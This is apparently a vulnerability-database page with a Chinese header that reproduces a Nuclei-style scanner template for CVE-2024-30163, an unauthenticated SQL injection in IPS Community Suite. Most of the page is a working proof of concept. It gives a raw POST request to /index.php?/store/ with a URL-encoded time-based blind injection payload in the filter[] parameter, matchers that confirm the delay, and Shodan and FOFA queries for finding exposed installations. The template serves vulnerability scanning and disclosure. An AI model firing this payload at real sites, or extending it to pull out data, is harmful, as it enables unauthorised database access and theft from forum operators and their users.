漏洞描述
IPS Community Suite is vulnerable to unauthenticated SQL injection via the filter[] parameter in the /index.php?/store/ endpoint, allowing attackers to extract sensitive information from the database.
CVE-2024-30163: IPS Community Suite - Unauthenticated SQL Injection
PoC代码[已公开]
id: CVE-2024-30163
info:
name: IPS Community Suite - Unauthenticated SQL Injection
author: ritikchaddha
severity: critical
description: |
IPS Community Suite is vulnerable to unauthenticated SQL injection via the filter[] parameter in the /index.php?/store/ endpoint, allowing attackers to extract sensitive information from the database.
remediation: |
Update to the latest version of IPS Community Suite.
reference:
- https://karmainsecurity.com/pocs/CVE-2024-30163.php
- https://nvd.nist.gov/vuln/detail/CVE-2024-30163
classification:
cve-id: CVE-2024-30163
cwe-id: CWE-89
epss-score: 0.53364
epss-percentile: 0.97907
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
vendor: invision
product: ips_community_suite
max-request: 1
verified: true
shodan-query: html:"invision community"
fofa-query: body="invision community"
tags: cve,cve2024,ips,invision-community,sqli
http:
- raw:
- |
@timeout: 30s
POST /index.php?/store/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cat=1&filter[%60%20ON%201%20UNION%20SELECT%20IF(ORD(SUBSTR((1),1,1))%3C126,1,SLEEP(7))%20OR%20%3F%3D%3F%23]=1
matchers:
- type: dsl
dsl:
- "duration>=7"
- "contains(tolower(body), 'invision community')"
condition: and
# digest: 490a0046304402200a26c02191adae461fc0ac3b02ce19c9f94211904ea1c0bebe0979f49997f06d02200d3a10416e5179c94003d527591ec72bcdadfcfc71bae2dc707d7eb080c32ac8:922c64590222798bb761d5b6d8e72950